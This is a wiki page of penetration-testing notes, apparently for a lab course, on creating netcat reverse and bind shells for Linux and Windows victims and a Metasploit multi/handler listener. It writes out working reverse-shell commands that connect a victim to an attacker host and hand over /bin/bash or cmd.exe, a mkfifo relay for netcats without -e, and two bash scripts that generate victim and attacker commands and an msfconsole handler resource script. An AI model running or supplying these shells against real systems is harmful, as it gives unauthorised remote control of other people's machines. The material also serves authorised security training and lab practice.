
Create reverse shell listener

lethanhtung01011980 edited this page Apr 23, 2020 · 12 revisions

Refs:

Netcat to establish connection

  • Listen on a TCP port for a reverse shell: nc -nlvp 5678 (add -u to listen on UDP instead; start the listener before the victim connects)
  • Connect to a netcat port: nc -nv $ip 5678
  • Send a file using netcat: nc -nv $ip 5678 < /usr/share/windows-binaries/wget.exe
  • Receive a file using netcat: nc -nlvp 5678 > incoming.exe (start the receiving side first, then run the sending side; verify the size or hash afterwards, netcat gives no transfer status)
  • Avoid using 4444 as other students may use it also.
  • Set ftp to binary mode before uploading an exe file, otherwise the transfer corrupts the binary: ftp> binary

root@kali:~# nc -h (relevant options from the netcat help output)

  • -c shell commands as `-e'; use /bin/sh to exec [dangerous!!]
  • -e prog program to exec after connect [dangerous!!]
  • -l listen mode, for inbound connects
  • -n numeric-only IP addresses, no DNS
  • -p port local port number
  • -v verbose [use twice to be more verbose]
  • -e /bin/bash for a Linux victim and -e cmd.exe for a Windows victim. Only netcat builds compiled with -e support this (nc.exe from /usr/share/windows-binaries, nc.traditional, ncat); the OpenBSD netcat shipped as nc on many Linux distributions has no -e, so check nc -h on the victim first.

Create reverse shell using nc.exe (easier to get through a firewall: the victim makes an outbound connection, and outbound traffic is filtered far less often than inbound)

  • -e /bin/bash for Linux victim and -e cmd.exe for Windows victim
  • Requires that the victim can reach the attacker (e.g. the victim can ping the attacker)
  • Attacker to listen first: nc -nlvp 4444
  • Linux victim to execute reverse shell: nc -nv attacker_ip 4444 -e /bin/bash
  • Windows victim to execute reverse shell: nc.exe -nv attacker_ip 4444 -e cmd.exe

Create direct shell (bind shell) using nc.exe

  • -e /bin/bash for Linux victim and -e cmd.exe for Windows victim
  • Requires that the attacker can reach the victim (e.g. the attacker can ping the victim) and that the chosen inbound port is not blocked by a firewall on the victim
  • Windows victim to listen first: nc.exe -nlvp 4444 -e cmd.exe
  • Linux victim to listen first: nc -nlvp 4444 -e /bin/bash
  • Attacker to connect to victim: nc -nv victim_ip 4444
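The two procedures above (reverse and direct/bind shell) differ only in which side listens and which side gets -e. The script below is an added example, not code from the original wiki: it prints the command each side runs for either mode, rejects the shared port 4444 the notes warn about, and falls back to a mkfifo relay for a Linux victim whose netcat lacks -e. The IP addresses and ports are placeholders, not real targets.

```bash
#!/usr/bin/env bash
# Added example, not code from the original wiki: print the exact netcat
# command each side runs for a reverse or bind (direct) shell, and fall back
# to a mkfifo relay when the Linux victim's netcat has no -e option (the
# OpenBSD netcat on many distros). IPs and ports below are placeholders.
set -eu

# Reject non-numeric or out-of-range ports, and the shared default 4444
# that the notes above warn about.
check_port() {
    local port="$1"
    case "$port" in
        ''|*[!0-9]*) echo "port must be numeric" >&2; return 1 ;;
    esac
    if [ "$port" -lt 1 ] || [ "$port" -gt 65535 ]; then
        echo "port out of range: $port" >&2; return 1
    fi
    if [ "$port" -eq 4444 ]; then
        echo "4444 is the port everyone uses; pick another" >&2; return 1
    fi
    return 0
}

# victim_cmd <reverse|bind> <linux|windows> <attacker_ip> <port> [yes|no]
# The fifth argument says whether the victim's netcat supports -e
# (nc.exe, nc.traditional and ncat do; OpenBSD nc does not). Without -e a
# named pipe carries the shell's input while nc carries its output.
victim_cmd() {
    local mode="$1" os="$2" ip="$3" port="$4" has_e="${5:-yes}"
    check_port "$port" || return 1
    local relay="rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1"
    case "$mode/$os/$has_e" in
        reverse/linux/yes)  echo "nc -nv $ip $port -e /bin/bash" ;;
        reverse/linux/no)   echo "$relay | nc -nv $ip $port > /tmp/f" ;;
        reverse/windows/*)  echo "nc.exe -nv $ip $port -e cmd.exe" ;;
        bind/linux/yes)     echo "nc -nlvp $port -e /bin/bash" ;;
        bind/linux/no)      echo "$relay | nc -nlvp $port > /tmp/f" ;;
        bind/windows/*)     echo "nc.exe -nlvp $port -e cmd.exe" ;;
        *) echo "usage: victim_cmd <reverse|bind> <linux|windows> <ip> <port> [yes|no]" >&2; return 1 ;;
    esac
}

# attacker_cmd <reverse|bind> <victim_ip> <port>
# Reverse: the attacker listens and must be started first.
# Bind: the victim listens and the attacker connects afterwards.
attacker_cmd() {
    local mode="$1" ip="$2" port="$3"
    check_port "$port" || return 1
    case "$mode" in
        reverse) echo "nc -nlvp $port" ;;
        bind)    echo "nc -nv $ip $port" ;;
        *) echo "mode must be reverse or bind" >&2; return 1 ;;
    esac
}

# Stand-alone demo with placeholder addresses (run with no arguments).
if [ "$#" -eq 0 ]; then
    echo "# reverse shell, Linux victim whose nc has no -e:"
    echo "attacker (start first): $(attacker_cmd reverse 10.11.1.5 5678)"
    echo "victim:                 $(victim_cmd reverse linux 10.11.0.4 5678 no)"
fi
```

The mkfifo relay is the standard workaround when -e is unavailable: the shell reads its commands from the named pipe, its output goes through netcat, and netcat writes whatever it receives back into the pipe.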

Create shell listener FIRST (the handler must be running before the payload executes on the victim, otherwise the connection is refused and the payload dies)

  • msfconsole
  • msf > use exploit/multi/handler
  • msf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp (must be the same payload, LHOST and LPORT the victim's payload was generated with)
  • msf exploit(handler) > set LHOST Attacker_IP
  • msf exploit(handler) > set LPORT 5678
  • msf exploit(handler) > set ExitOnSession false (keep the handler running after the first session so further connections are still accepted)
  • msf exploit(handler) > exploit -j (run the handler as a background job)
  • msf exploit(handler) > sessions -i 1
  • With windows/shell/reverse_tcp, sessions -i drops straight into a Windows command shell. The meterpreter > shell step only applies when the payload is windows/meterpreter/reverse_tcp; there, shell opens cmd.exe from the Meterpreter prompt.
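Typing the handler setup by hand each time is error-prone, and a mismatch between the handler's payload and the victim's payload is the usual reason no session appears. The script below is an added example, not code from the original wiki: it writes the steps above into an msfconsole resource script so the listener can be started with a single command, and records which follow-up command (if any) applies after sessions -i depending on the payload family. The LHOST and LPORT values are placeholders.

```bash
#!/usr/bin/env bash
# Added example, not from the original wiki: write an msfconsole resource
# script for the multi/handler listener so it can be started with one
# command (msfconsole -q -r handler.rc) before the payload runs on the
# victim. The LHOST/LPORT values used below are placeholders.
set -eu

# write_handler_rc <outfile> <payload> <lhost> <lport>
# The payload, LHOST and LPORT must match what the victim's payload was
# built with (e.g. by msfvenom), otherwise the handler never sees a session.
write_handler_rc() {
    local out="$1" payload="$2" lhost="$3" lport="$4"
    case "$lport" in
        ''|*[!0-9]*) echo "LPORT must be numeric" >&2; return 1 ;;
    esac
    case "$payload" in
        */*) ;;
        *) echo "payload must be a full path such as windows/shell/reverse_tcp" >&2; return 1 ;;
    esac
    cat > "$out" <<EOF
use exploit/multi/handler
set PAYLOAD $payload
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j
EOF
}

# post_interact_step <payload>
# After "sessions -i N": meterpreter payloads give a meterpreter > prompt,
# where "shell" drops to cmd.exe or sh; shell payloads are already a command
# shell, so nothing further is typed (empty result).
post_interact_step() {
    case "$1" in
        */meterpreter/*|*/meterpreter_*) echo "shell" ;;
        */shell/*|*/shell_*) echo "" ;;
        *) echo "unknown payload family: $1" >&2; return 1 ;;
    esac
}

# Usage: ./handler_rc.sh <outfile> <payload> <lhost> <lport>
# e.g.   ./handler_rc.sh handler.rc windows/shell/reverse_tcp 10.11.0.4 5678
#        msfconsole -q -r handler.rc
if [ "$#" -eq 4 ]; then
    write_handler_rc "$@"
fi
```

Because ExitOnSession is false and the handler runs as a job, the same resource script serves several victims in a row; use sessions -l to see what has connected.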
